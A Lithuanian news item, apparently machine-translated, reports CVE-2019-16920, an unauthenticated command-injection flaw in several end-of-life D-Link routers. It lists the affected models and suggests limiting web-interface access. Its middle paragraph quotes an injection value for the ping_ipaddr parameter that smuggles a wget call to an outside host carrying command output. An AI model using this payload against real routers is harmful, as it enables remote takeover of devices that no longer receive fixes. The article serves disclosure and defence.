Nuotoliniu būdu išnaudojamas „D-Link“ maršrutizatorių pažeidžiamumas

„D-Link“ belaidžiuose maršrutizatoriuose nustatyta pavojingas pažeidžiamumas (CVE-2019-16920), kuri leidžia nuotoliniu būdu vykdyti kodą įrenginio pusėje, siunčiant specialią užklausą „ping_test“ tvarkyklei, pasiekiamai be autentifikavimo.

Įdomu tai, kad, pasak programinės įrangos kūrėjų, „ping_test“ iškvietimas turėtų būti vykdomas tik po autentifikavimo, tačiau iš tikrųjų jis iškviečiamas bet kokiu atveju, nepriklausomai nuo prisijungimo prie žiniatinklio sąsajos. Visų pirma, kai pasiekiate scenarijų application_sec.cgi ir perduodamas parametras „action=ping_test“, scenarijus nukreipia į autentifikavimo puslapį, tačiau tuo pačiu metu atlieka veiksmą, susijusį su ping_test. Kodui vykdyti, pačiame ping_test buvo panaudotas kitas pažeidžiamumas, kuris iškviečia ping paslaugų programą tinkamai nepatikrinęs, ar testavimui išsiųstas IP adresas yra teisingas. Pavyzdžiui, norėdami iškviesti wget įrankį ir perkelti komandos „echo 1234“ rezultatus į išorinį pagrindinį kompiuterį, tiesiog nurodykite parametrą „ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://“. test.test/?$( echo 1234)".

Nuotoliniu būdu išnaudojamas „D-Link“ maršrutizatorių pažeidžiamumas

Pažeidžiamumo buvimas oficialiai patvirtintas šiuose modeliuose:

  • DIR-655 su 3.02b05 ar senesne programine įranga;
  • DIR-866L su 1.03b04 ar senesne programine įranga;
  • DIR-1565 su 1.01 ar senesne programine įranga;
  • DIR-652 (informacijos apie problemines programinės aparatinės įrangos versijas nepateikiama)

Šių modelių palaikymo laikotarpis jau baigėsi, todėl „D-Link“. jis teigė,, kuri neišleis jiems atnaujinimų, kad pašalintų pažeidžiamumą, nerekomenduoja jų naudoti ir pataria pakeisti naujais įrenginiais. Kaip saugumo sprendimą galite apriboti prieigą prie žiniatinklio sąsajos tik patikimais IP adresais.

Vėliau buvo nustatyta, kad pažeidžiamumas taip pat buvo paveikia modeliai DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 ir DIR-825, kurių atnaujinimų išleidimo planai dar nėra žinomi.

Šaltinis: opennet.ru

Добавить комментарий